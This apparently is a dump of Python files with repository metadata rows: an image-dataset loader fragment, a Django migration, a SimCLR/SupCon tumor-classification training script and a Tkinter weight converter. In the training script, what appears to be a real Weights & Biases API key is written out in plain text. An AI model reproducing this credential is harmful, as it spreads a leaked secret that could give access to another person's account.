imset['img'] = np.stack([imread(filename) for filename in self.img_paths[index]],0)
filename = self.img_paths[index][0] # ex: /home/jovyan/data/chips/lat_43_09_lon_5_93/img_08_t_2020-02-17.png
imset['filename'] = filename
lat_lon = filename.split('/')[-2]
timestamp = filename.split('/')[-1].replace('.png','')[-10:]
index = (self.df_labels['lat_lon']==lat_lon) * (self.df_labels['timestamp']==timestamp)
imset['y'] = float(self.df_labels[index]['count'].values)
if self.augment is True:
h_flip, v_flip = np.random.rand(1)>0.5, np.random.rand(1)>0.5 # random flip
if v_flip:
imset['img'] = imset['img'][:,::-1]
if h_flip:
imset['img'] = imset['img'][:,:,::-1]
k = np.random.randint(4) # random rotate
imset['img'] = np.rot90(imset['img'], k=k, axes=(1,2))
crop_x = np.random.randint(0, self.crop_size)
crop_y = np.random.randint(0, self.crop_size)
imset['img'] = imset['img'][:, crop_x:-self.crop_size+crop_x, crop_y:-self.crop_size+crop_y]
imset['img'] = torch.from_numpy(skimage.img_as_float(imset['img']))
### Add grid as channel --> Warp image // Spatial Transform Networks
#H, W = 100, 100
#pool_size = 10
#grid = torch.zeros((pool_size,pool_size))
#grid[:1] += 1
#grid[-1:] += 1
#grid[1:-1,:1] += 1
#grid[1:-1,-1] += 1
#grid = torch.cat(H//pool_size*[grid],0)
#grid = torch.cat(W//pool_size*[grid],1)
#grid = grid.reshape(1,H,W)
#if self.augment is True:
# grid = grid[:, crop_x:-self.crop_size+crop_x, crop_y:-self.crop_size+crop_y]
#imset['img'] = torch.cat([imset['img'], grid.double()], 0)
###
imset['y'] = torch.from_numpy(np.array([imset['y']]))
return imset
def plot_dataset(dataset, n_frames=14, n_rows=2):
""" Plot dataset images. """
fig = plt.figure(figsize=(16,5))
for t in range(n_frames):
plt.subplot(n_rows,n_frames//n_rows,1+t)
imset = dataset[t]
x = imset['img']
y = int(imset['y'])
plt.imshow(x[0], cmap='coolwarm', vmin=0., vmax=0.4) # NIR band
#plt.imshow(np.stack([x[0]**0.5, 0.5*(x[1]+x[0]), 0.5*(1-x[1])],-1)) # composite color
plt.xticks([])
plt.yticks([])
plt.title('Label {}'.format(y))
fig.tight_layout()
plt.show()
| 46.206186 | 245 | 0.623159 | 1,257 | 8,964 | 4.232299 | 0.210819 | 0.030075 | 0.011842 | 0.019737 | 0.318233 | 0.245113 | 0.17782 | 0.133459 | 0.129323 | 0.114662 | 0 | 0.0233 | 0.233936 | 8,964 | 193 | 246 | 46.445596 | 0.75142 | 0.19411 | 0 | 0.077519 | 0 | 0.007752 | 0.073625 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 1 | 0.054264 | false | 0 | 0.108527 | 0.007752 | 0.209302 | 0.015504 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8652ce1f4d491ac51c01beec050b8b2ec65cf9 | 537 | py | Python | foundation/organisation/migrations/0008_auto_20160707_0752.py | breck7/website | e1d72c3db7612aaa64c47fb6117a788b955c4ab0 | [
"MIT"
] | 74 | 2016-06-27T17:06:44.000Z | 2022-03-20T19:42:07.000Z | foundation/organisation/migrations/0008_auto_20160707_0752.py | breck7/website | e1d72c3db7612aaa64c47fb6117a788b955c4ab0 | [
"MIT"
] | 370 | 2016-06-09T09:15:00.000Z | 2022-03-28T19:02:31.000Z | foundation/organisation/migrations/0008_auto_20160707_0752.py | Mattlk13/website | 83abd726ae3ae377480010fd46e9c141bc76b39e | [
"MIT"
] | 104 | 2016-06-09T15:16:02.000Z | 2022-03-12T13:14:10.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organisation', '0007_add_old_project_bool_to_project_model'),
]
operations = [
migrations.AlterField(
model_name='networkgroupmembership',
name='order',
field=models.IntegerField(help_text=b'The lower the number the higher on the page this Person will be shown.', null=True, blank=True),
),
]
| 26.85 | 146 | 0.662942 | 60 | 537 | 5.7 | 0.783333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.236499 | 537 | 19 | 147 | 28.263158 | 0.821951 | 0.039106 | 0 | 0 | 0 | 0 | 0.293774 | 0.124514 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8ac7cbb9f4d5011c5d79818e1d5441c30c36b1 | 27,134 | py | Python | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | train_bk_cl_redo.py | Eren-Corn0712/CV_DL-Contrastive-Learning | c59ba5e2ae31c14ef4e175c79e3575e2cc7c439c | [
"MIT"
] | null | null | null | import os
import argparse
import math
import datetime
import pandas as pd
import torch.utils.data
import torch
import wandb
import wandb.sklearn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import warnings
from torchvision.datasets import ImageFolder
from util import AverageMeter, ContrastiveTransformations
from util import adjust_learning_rate, warmup_learning_rate
from util import set_optimizer, save_model, same_seeds
from tqdm import tqdm
from sklearn.metrics import accuracy_score, classification_report
from aug_util import show_augmentation_image, test_weight_sampler
from aug_util import Erosion, Resize_Pad, GaussianBlur
from pytorch_metric_learning.losses import SupConLoss, NTXentLoss
from torch.utils.data import WeightedRandomSampler
from model import CLRBackbone, CLRLinearClassifier, CLRClassifier
try:
import apex
from apex import amp, optimizers
except ImportError:
pass
train_path = 'tumor_data/train'
test_path = 'tumor_data/test'
exp_time = datetime.datetime.today().date()
project = f'CLR_Project_implicit_resnet18'
num_workers = int(os.cpu_count() / 4)
warnings.filterwarnings("ignore")
def make_weights_for_balanced_classes(images, nclasses):
count = [0] * nclasses
for item in images:
count[item[1]] += 1
weight_per_class = [0.] * nclasses
N = float(sum(count))
for i in range(nclasses):
weight_per_class[i] = N / float(count[i])
weight = [0] * len(images)
for idx, val in enumerate(images):
weight[idx] = weight_per_class[val[1]]
return weight
class SimCLRFTransform:
def __init__(self, opt, eval_transform: bool = False, ) -> None:
self.normalize = transforms.Normalize(mean=opt.mean, std=opt.std)
s = 1.0
self.color_jitter = transforms.ColorJitter(0.8 * s, 0.8 * s, 0.8 * s, 0.2 * s)
self.resize = transforms.Resize(size=(opt.size, opt.size))
self.random_crop_resize = transforms.RandomResizedCrop(size=opt.size, scale=(0.2, 1.))
self.erosion = Erosion(p=0.5)
if not eval_transform:
data_transforms = [
transforms.RandomVerticalFlip(p=0.5),
transforms.RandomHorizontalFlip(p=0.5),
# transforms.RandomApply([self.color_jitter], p=0.8),
transforms.RandomChoice([
transforms.RandomEqualize(p=0.5),
transforms.RandomAutocontrast(p=0.5),
transforms.RandomAdjustSharpness(2, p=0.5),
]),
transforms.RandomGrayscale(p=0.2),
Resize_Pad(opt.size)
]
else:
data_transforms = [
# transforms.RandomHorizontalFlip(p=0.5),
Resize_Pad(opt.size)
]
if opt.gaussian_blur:
kernel_size = int(0.1 * opt.size)
if kernel_size % 2 == 0:
kernel_size += 1
data_transforms.append(GaussianBlur(kernel_size=kernel_size, p=0.5))
if self.normalize is None:
final_transform = transforms.ToTensor()
else:
final_transform = transforms.Compose([transforms.ToTensor(), ])
data_transforms.append(final_transform)
self.transform = transforms.Compose(data_transforms)
def __call__(self, sample):
return self.transform(sample)
def parse_option_bk():
parser = argparse.ArgumentParser('argument for training')
# Training Hyper-parameter
parser.add_argument('--batch_size', type=int, default=64,
help='batch_size')
parser.add_argument('--num_workers', type=int, default=num_workers,
help='num of workers to use')
parser.add_argument('--epochs', type=int, default=350,
help='number of training epochs')
# optimization
parser.add_argument('--learning_rate', type=float, default=0.5,
help='learning rate')
parser.add_argument('--lr_decay_epochs', type=str, default='250,300,350',
help='where to decay lr, can be a list')
parser.add_argument('--lr_decay_rate', type=float, default=0.1,
help='decay rate for learning rate')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='weight decay')
parser.add_argument('--momentum', type=float, default=0.9,
help='momentum')
# model dataset
parser.add_argument('--model', type=str, default='implicit_resnet18')
parser.add_argument('--head', type=str, default='mlp_bn', choices=['mlp', 'mlp_bn', '2mlp_bn'])
parser.add_argument('--feat_dim', type=int, default=256)
parser.add_argument('--dataset', type=str, default='tumor',
choices=['tumor', 'path'], help='dataset')
parser.add_argument('--mean', type=str, help='mean of dataset in path in form of str tuple')
parser.add_argument('--std', type=str, help='std of dataset in path in form of str tuple')
parser.add_argument('--size', type=int, default=224, help='parameter for RandomResizedCrop')
# method
parser.add_argument('--method', type=str, default='SupCon',
choices=['SupCon', 'SimCLR'], help='choose method')
# temperature
parser.add_argument('--temp', type=float, default=0.1,
help='temperature for loss function')
# other setting
parser.add_argument('--cosine', type=bool, default=True,
help='using cosine annealing')
parser.add_argument('--warm', action='store_true',
help='warm-up for large batch training')
parser.add_argument('--trial', type=str, default='0',
help='id for recording multiple runs')
parser.add_argument('--gaussian_blur', type=bool, default=True,
help='Gaussian_blur for DataAugmentation')
opt = parser.parse_args()
return opt
def parse_option_linear():
parser = argparse.ArgumentParser('argument for training')
parser.add_argument('--batch_size', type=int, default=64,
help='batch_size')
parser.add_argument('--num_workers', type=int, default=num_workers,
help='num of workers to use')
parser.add_argument('--epochs', type=int, default=100,
help='number of training epochs')
# optimization
parser.add_argument('--learning_rate', type=float, default=0.1,
help='learning rate')
parser.add_argument('--lr_decay_epochs', type=str, default='50,75,90',
help='where to decay lr, can be a list')
parser.add_argument('--lr_decay_rate', type=float, default=0.2,
help='decay rate for learning rate')
parser.add_argument('--weight_decay', type=float, default=0,
help='weight decay')
parser.add_argument('--momentum', type=float, default=0.9,
help='momentum')
# model dataset
parser.add_argument('--model', type=str, default='implicit_resnet18')
parser.add_argument('--dataset', type=str, default='tumor',
choices=['tumor', 'path'], help='dataset')
parser.add_argument('--size', type=int, default=224, help='parameter for Resize')
# other setting
parser.add_argument('--cosine', type=bool, default=True,
help='using cosine annealing')
parser.add_argument('--warm', action='store_true',
help='warm-up for large batch training')
# load pre-train model
parser.add_argument('--trial', type=str, default='0',
help='id for recording multiple runs')
# method
parser.add_argument('--method', type=str, default='SupCon',
choices=['SupCon', 'SimCLR'], help='choose method')
parser.add_argument('--gaussian_blur', type=bool, default=False,
help='Gaussian_blur for DataAugmentation')
parser.add_argument('--classifier', type=str, default='ML',
choices=['ML', 'SL'])
opt = parser.parse_args()
return opt
def set_folder_bk(opt):
opt.model_path = './save_{}/{}_models'.format(exp_time, opt.dataset)
opt.wandb_path = './save_{}/{}_wandb'.format(exp_time, opt.dataset)
iterations = opt.lr_decay_epochs.split(',')
opt.lr_decay_epochs = list([])
for it in iterations:
opt.lr_decay_epochs.append(int(it))
opt.model_name = '{}_{}_{}_lr_{}_decay_{}_bsz_{}_temp_{}_trial_{}'. \
format(opt.method, opt.dataset, opt.model, opt.learning_rate,
opt.weight_decay, opt.batch_size, opt.temp, opt.trial)
# warm-up for large-batch training,
if opt.batch_size > 32:
opt.warm = True
if opt.warm:
opt.model_name = '{}_warm'.format(opt.model_name)
opt.warmup_from = 0.01
opt.warm_epochs = 10
if opt.cosine:
eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)
opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (
1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2
else:
opt.warmup_to = opt.learning_rate
# If the pathname refers to an existing directory
opt.wandb_folder = os.path.join(opt.wandb_path, opt.model_name)
if not os.path.isdir(opt.wandb_folder):
os.makedirs(opt.wandb_folder)
opt.save_folder = os.path.join(opt.model_path, opt.model_name)
if not os.path.isdir(opt.save_folder):
os.makedirs(opt.save_folder)
return opt
def set_loader_bk(opt):
# construct data loader
if opt.dataset == 'tumor':
mean = (0.1771, 0.1771, 0.1771)
std = (0.1842, 0.1842, 0.1842)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.mean = mean
opt.std = std
train_transform = SimCLRFTransform(opt, eval_transform=False)
test_transform = SimCLRFTransform(opt, eval_transform=False)
opt.train_transform = list(train_transform.transform.transforms)
opt.test_transform = list(test_transform.transform.transforms)
if opt.dataset == 'tumor':
opt.train_path = train_path
opt.test_path = test_path
train_dataset = ImageFolder(opt.train_path,
ContrastiveTransformations(train_transform))
test_dataset = ImageFolder(opt.test_path,
ContrastiveTransformations(test_transform))
else:
raise ValueError(opt.dataset)
weights = make_weights_for_balanced_classes(train_dataset.imgs, len(train_dataset.classes))
weights = torch.DoubleTensor(weights)
sampler = WeightedRandomSampler(weights, len(weights))
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=opt.batch_size,
num_workers=opt.num_workers,
sampler=sampler,
pin_memory=True, )
test_loader = torch.utils.data.DataLoader(
test_dataset,
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True, )
return train_loader, test_loader
def set_loader_linear(opt):
# construct data loader
if opt.dataset == 'tumor':
mean = (0.1771, 0.1771, 0.1771)
std = (0.1842, 0.1842, 0.1842)
elif opt.dataset == 'path':
mean = eval(opt.mean)
std = eval(opt.std)
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.mean = mean
opt.std = std
train_transform = SimCLRFTransform(opt, eval_transform=False)
test_transform = SimCLRFTransform(opt, eval_transform=True)
opt.train_transform = list(train_transform.transform.transforms)
opt.test_transform = list(test_transform.transform.transforms)
if opt.dataset == 'tumor':
opt.train_path = train_path
opt.test_path = test_path
train_dataset = ImageFolder(opt.train_path,
train_transform)
test_dataset = ImageFolder(opt.test_path,
test_transform)
else:
raise ValueError(opt.dataset)
weights = make_weights_for_balanced_classes(train_dataset.imgs, len(train_dataset.classes))
weights = torch.DoubleTensor(weights)
sampler = WeightedRandomSampler(weights, len(weights))
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=opt.batch_size,
sampler=sampler,
num_workers=opt.num_workers,
pin_memory=True,
)
test_loader = torch.utils.data.DataLoader(
test_dataset,
batch_size=opt.batch_size,
shuffle=True,
num_workers=opt.num_workers,
pin_memory=True,
)
return train_dataset, train_loader, test_dataset, test_loader
def set_folder_linear(opt):
opt.model_path = './save_{}/cls_{}_models'.format(exp_time, opt.dataset)
opt.wandb_path = './save_{}/cls_{}_wandb'.format(exp_time, opt.dataset)
iterations = opt.lr_decay_epochs.split(',')
opt.lr_decay_epochs = list([])
for it in iterations:
opt.lr_decay_epochs.append(int(it))
opt.model_name = '{}_{}_{}_lr_{}_decay_{}_bsz_{}_{}'. \
format(opt.method, opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,
opt.batch_size, opt.trial)
if opt.cosine:
opt.model_name = '{}_cosine'.format(opt.model_name)
# warm-up for large-batch training,
if opt.warm:
opt.model_name = '{}_warm'.format(opt.model_name)
opt.warmup_from = 0.01
opt.warm_epochs = 10
if opt.cosine:
eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)
opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (
1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2
else:
opt.warmup_to = opt.learning_rate
if opt.dataset == 'tumor':
opt.n_cls = 2
else:
raise ValueError('dataset not supported: {}'.format(opt.dataset))
opt.wandb_folder = os.path.join(opt.wandb_path, opt.model_name)
if not os.path.isdir(opt.wandb_folder):
os.makedirs(opt.wandb_folder)
opt.save_folder = os.path.join(opt.model_path, opt.model_name)
if not os.path.isdir(opt.save_folder):
os.makedirs(opt.save_folder)
return opt
def set_backbone(opt):
model = CLRBackbone(name=opt.model, head=opt.head, feat_dim=opt.feat_dim)
if opt.method == 'SupCon':
criterion = SupConLoss(temperature=opt.temp)
elif opt.method == 'SimCLR':
criterion = NTXentLoss(temperature=opt.temp)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
if torch.cuda.is_available():
model = model.cuda()
criterion = criterion.cuda()
cudnn.benchmark = True
return model, criterion
def train_backbone(train_loader, model, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.train()
losses = AverageMeter()
process_bar = tqdm(train_loader, total=len(train_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'TB epoch:{epoch} {opt.model}')
for idx, (images, labels) in enumerate(process_bar):
# [AugmentImage1,AugmentImage2]
images = torch.cat([images[0], images[1]], dim=0)
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)
# compute loss
features = model(images) # features size is 2B x 128
if opt.method == 'SupCon':
labels = torch.cat([labels, labels], dim=0).to(device=features.device) # (B)-> (2B)
loss = criterion(features, labels)
elif opt.method == 'SimCLR':
labels = torch.arange(bsz).to(device=features.device)
labels = torch.cat([labels, labels], dim=0) # (B) -> (2B)
loss = criterion(features, labels)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
# update metric
losses.update(loss.item(), bsz)
# SGD
optimizer.zero_grad()
loss.backward()
optimizer.step()
process_bar.set_postfix_str(
'loss {loss.val:.4f} ({loss.avg:.4f})'.format(loss=losses))
return losses.avg
def train_linear(train_loader, model, classifier, criterion, optimizer, epoch, opt):
"""one epoch training"""
model.eval()
classifier.train()
losses = AverageMeter()
top1 = AverageMeter()
process_bar = tqdm(train_loader, total=len(train_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'TC epoch:{epoch} {opt.model}')
for idx, (images, labels) in enumerate(process_bar):
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# warm-up learning rate
warmup_learning_rate(opt, epoch, idx, len(train_loader), optimizer)
# compute loss
with torch.no_grad():
features = model.encoder(images)
output = classifier(features.detach())
loss = criterion(output, labels)
predictions = torch.argmax(output, 1)
# update metric
acc = accuracy_score(y_true=labels.view(-1).detach().cpu().numpy(),
y_pred=predictions.view(-1).detach().cpu().numpy(),
normalize=True)
losses.update(loss.item(), bsz)
top1.update(acc)
# SGD
optimizer.zero_grad()
loss.backward()
optimizer.step()
process_bar.set_postfix_str(
'loss {loss.val:.3f} ({loss.avg:.3f}) Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses, top1=top1))
return losses.avg, top1.avg
def validation_backbone(val_loader, model, criterion, opt):
"""one epoch training"""
model.eval()
losses = AverageMeter()
with torch.no_grad():
process_bar = tqdm(val_loader, total=len(val_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'VB:{opt.model}')
for idx, (images, labels) in enumerate(process_bar):
images = torch.cat([images[0], images[1]], dim=0)
if torch.cuda.is_available():
images, labels = images.cuda(), labels.cuda()
bsz = labels.shape[0]
# compute loss
features = model(images) # 2B x 128
if opt.method == 'SupCon':
labels = torch.cat([labels, labels], dim=0) # (B,)-> (2B,)
loss = criterion(features, labels)
elif opt.method == 'SimCLR':
labels = torch.arange(bsz)
labels = torch.cat([labels, labels], dim=0)
loss = criterion(features, labels)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.method))
# update metric
losses.update(loss.item(), bsz)
process_bar.set_postfix_str(
'loss {loss.val:.4f} ({loss.avg:.4f})'.format(loss=losses))
return losses.avg
def validate_linear(val_loader, model, classifier, criterion, opt):
"""validation"""
model.eval()
classifier.eval()
losses = AverageMeter()
top1 = AverageMeter()
y_pred = list() # save predict label
y_true = list() # save ground truth
with torch.no_grad():
process_bar = tqdm(val_loader, total=len(val_loader), ascii=True, position=0, leave=True)
process_bar.set_description(f'VC:{opt.model}')
for idx, (images, labels) in enumerate(process_bar):
images = images.float().cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
bsz = labels.shape[0]
# forward and freeze backbone network
output = classifier(model.encoder(images))
loss = criterion(output, labels)
# update metric
losses.update(loss.item(), bsz)
predictions = torch.argmax(output, 1)
# update metric
acc = accuracy_score(y_true=labels.view(-1).detach().cpu().numpy(),
y_pred=predictions.view(-1).detach().cpu().numpy(),
normalize=True)
losses.update(loss.item(), bsz)
top1.update(acc)
# update y_pred and y_true
y_pred.extend(predictions.view(-1).detach().cpu().numpy())
y_true.extend(labels.view(-1).detach().cpu().numpy())
process_bar.set_postfix_str(
'loss {loss.val:.3f} ({loss.avg:.3f}) Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(loss=losses,
top1=top1))
print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))
return losses.avg, top1.avg, y_pred, y_true
def set_model_linear(opt):
if opt.classifier == 'SL':
classifier = CLRLinearClassifier(name=opt.model, num_classes=opt.n_cls)
elif opt.classifier == 'ML':
classifier = CLRClassifier(name=opt.model, num_classes=opt.n_cls)
else:
raise ValueError('contrastive method not supported: {}'.
format(opt.classifier))
criterion = torch.nn.CrossEntropyLoss()
classifier = classifier.cuda()
criterion = criterion.cuda()
return classifier, criterion
def main():
opt_bk = parse_option_bk()
# random seed
same_seeds(seed=2022)
# create folder
set_folder_bk(opt_bk)
# build data loader
train_loader, test_loader = set_loader_bk(opt_bk)
show_augmentation_image(train_loader)
test_weight_sampler(train_loader)
# build model and linear_criterion
backbone, backbone_criterion = set_backbone(opt_bk)
# build optimizer
optimizer = set_optimizer(opt_bk, backbone)
# wandb
your_api_key = '6ca9efcfdd0230ae14f6160f01209f0ac93aff34'
wandb.login(key=your_api_key)
wandb.init(dir=opt_bk.wandb_folder,
config=vars(opt_bk),
project=project,
name=f'B_{opt_bk.model}_{opt_bk.method}_{opt_bk.trial}'
)
wandb.watch(models=backbone,
criterion=backbone_criterion,
log_freq=100,
log_graph=True,
log="all", )
for epoch in range(1, opt_bk.epochs + 1):
adjust_learning_rate(opt_bk, optimizer, epoch)
# train for one epoch
loss = train_backbone(train_loader, backbone, backbone_criterion, optimizer, epoch, opt_bk)
val_loss = validation_backbone(test_loader, backbone, backbone_criterion, opt_bk)
# wandb logger
wandb.log({'train_loss': loss, 'val_loss': val_loss, 'epoch': epoch}, )
wandb.log({'learning_rate': optimizer.param_groups[0]['lr'], 'epoch': epoch})
# save the last model
save_file = os.path.join(opt_bk.save_folder, f'last.pth')
save_model(backbone, optimizer, opt_bk, opt_bk.epochs, save_file)
wandb.finish()
# -------------------------------------------------------------------------
best_acc = 0
opt_linear = parse_option_linear()
# create folder
set_folder_linear(opt_linear)
# build data loader
train_dataset, train_loader, test_dataset, test_loader = set_loader_linear(opt_linear)
# We need class name for plot confuse matrix
class_names: list = train_dataset.classes
# build model and linear_criterion
classifier, linear_criterion = set_model_linear(opt_linear)
# build optimizer
optimizer = set_optimizer(opt_linear, classifier)
# wandb
wandb.init(dir=opt_linear.wandb_folder,
config=vars(opt_linear),
project=project,
name=f'L_{opt_linear.model}_{opt_linear.method}_{opt_linear.trial}',
)
wandb.watch(models=classifier,
criterion=linear_criterion,
log_freq=100,
log_graph=True,
log="all")
# training routine
for epoch in range(1, opt_linear.epochs + 1):
adjust_learning_rate(opt_linear, optimizer, epoch)
train_loss, train_acc = train_linear(train_loader, backbone, classifier,
linear_criterion,
optimizer, epoch, opt_linear)
# eval for one epoch
val_loss, val_acc, y_pred, y_true = validate_linear(test_loader, backbone, classifier,
linear_criterion, opt_linear)
wandb.log({'Train_Loss': train_loss, 'Val_Loss': val_loss, 'epoch': epoch})
wandb.log({'Train_Acc': train_acc, 'Val_Acc': val_acc, 'epoch': epoch})
wandb.log({'lr': optimizer.param_groups[0]['lr'], 'epoch': epoch})
result = classification_report(y_pred=y_pred, y_true=y_true, target_names=class_names, output_dict=True)
df = pd.DataFrame(result).transpose()
if val_acc > best_acc:
best_acc = val_acc
wandb.run.summary["best_accuracy"] = best_acc
# Create csv file to record experiment result
save_file = os.path.join(opt_linear.save_folder, f'ckpt_cls_{best_acc:.2f}.pth')
save_model(classifier, optimizer, opt_linear, opt_linear.epochs, save_file)
csv_file = os.path.join(opt_linear.save_folder, f'{epoch}_{best_acc:.2f}.csv')
df.to_csv(csv_file)
if epoch == opt_linear.epochs:
csv_file = os.path.join(opt_linear.save_folder, f'last.csv')
df.to_csv(csv_file)
print('best accuracy: {:.2f}'.format(best_acc))
# save the last model
save_file = os.path.join(opt_linear.save_folder, 'ckpt_cls_last.pth')
save_model(classifier, optimizer, opt_linear, opt_linear.epochs, save_file)
# Finish wandb
wandb.finish()
if __name__ == '__main__':
main()
| 37.119015 | 121 | 0.60098 | 3,209 | 27,134 | 4.889685 | 0.124026 | 0.021796 | 0.04117 | 0.007457 | 0.640176 | 0.606335 | 0.580014 | 0.563763 | 0.531961 | 0.515582 | 0 | 0.015332 | 0.281271 | 27,134 | 730 | 122 | 37.169863 | 0.789252 | 0.048021 | 0 | 0.541586 | 0 | 0.003868 | 0.103237 | 0.014109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030948 | false | 0.001934 | 0.05029 | 0.001934 | 0.110251 | 0.003868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b8ca0227c9aa50fd561c605a0cf30890d4c5368 | 2,672 | py | Python | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | 3 | 2021-06-13T22:48:16.000Z | 2021-07-09T13:07:51.000Z | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | null | null | null | Weight Converter By Coder Mohit.py | Mohit1108/Weight-Converter-By-Coder-Mohit | 76a634ac401888e8268f2511902bb7f5780faa93 | [
"MIT"
] | null | null | null | from tkinter import *
window = Tk()
window.title('Weight converter By Coder Mohit ')
def from_kg():
Gram = float(e2_value.get())*1000
Miligram = float(e2_value.get())*1000000
Microgram = float(e2_value.get())*1000000000
Tone = float(e2_value.get())/1000
Pound = float(e2_value.get())*2.205
ounce = float(e2_value.get())*35.274
t1.delete("1.0",END)
t1.insert(END, Gram)
t2.delete("1.0",END)
t2.insert(END, Miligram)
t3.delete("1.0",END)
t3.insert(END, Microgram)
t4.delete("1.0",END)
t4.insert(END, Tone)
t5.delete("1.0",END)
t5.insert(END, Pound)
t6.delete("1.0",END)
t6.insert(END, ounce)
def website():
import webbrowser
url = 'https://codermohit.com'
webbrowser.open(url)
def youtube():
import webbrowser
url = 'https://www.youtube.com/channel/UCaqKx5W0cSS0l2i2GgKQw9g?sub_confirmation=1'
webbrowser.open(url)
def exit():
window.destroy()
e1 = Label(window, text="Input the weight in KG",font=('Courier',15,'bold'))
e2_value = StringVar()
e2 = Entry(window, textvariable=e2_value,font=('Courier',15,))
e3 = Label(window, text="Gram",font=('Courier',15,))
e4 = Label(window, text="Miligram",font=('Courier',15,))
e5 = Label(window, text="Microgram",font=('Courier',15,))
e6 = Label(window, text="Tone",font=('Courier',15,))
e7 = Label(window, text="Pound",font=('Courier',15,))
e8 = Label(window, text="Ounce",font=('Courier',15,))
t1 = Text(window, height=7, width=30)
t2 = Text(window, height=7, width=30)
t3 = Text(window, height=7, width=30)
t4 = Text(window, height=7, width=30)
t5 = Text(window, height=7, width=30)
t6 = Text(window, height=7, width=30)
b1 = Button(window, text="Convert",font=('Courier',15,'bold'), command=from_kg,fg='white')
b2 = Button(window, text="Exit",font=('Courier',15,'bold'), command=exit,fg='white')
b3 = Button(window, text="Website",font=('Courier',15,'bold'), command=website,fg='white')
b4 = Button(window, text="YouTube",font=('Courier',15,'bold'), command=youtube,fg='white')
e1.grid(row=0, column=0)
e2.grid(row=0, column=1)
e3.grid(row=1, column=0)
e4.grid(row=1, column=1)
e5.grid(row=1, column=2)
e6.grid(row=3, column=0)
e7.grid(row=3, column=1)
e8.grid(row=3, column=2)
t1.grid(row=2, column=0)
t2.grid(row=2, column=1)
t3.grid(row=2, column=2)
t4.grid(row=4, column=0)
t5.grid(row=4, column=1)
t6.grid(row=4, column=2)
b1.grid(row=0, column=2)
b1.config(bg='green')
b2.grid(row=5, column=2)
b2.config(bg='#8B0000')
b3.grid(row=5, column=0)
b3.config(bg='#fb2056')
b4.grid(row=5, column=1)
b4.config(bg='#c4302b')
window.mainloop()
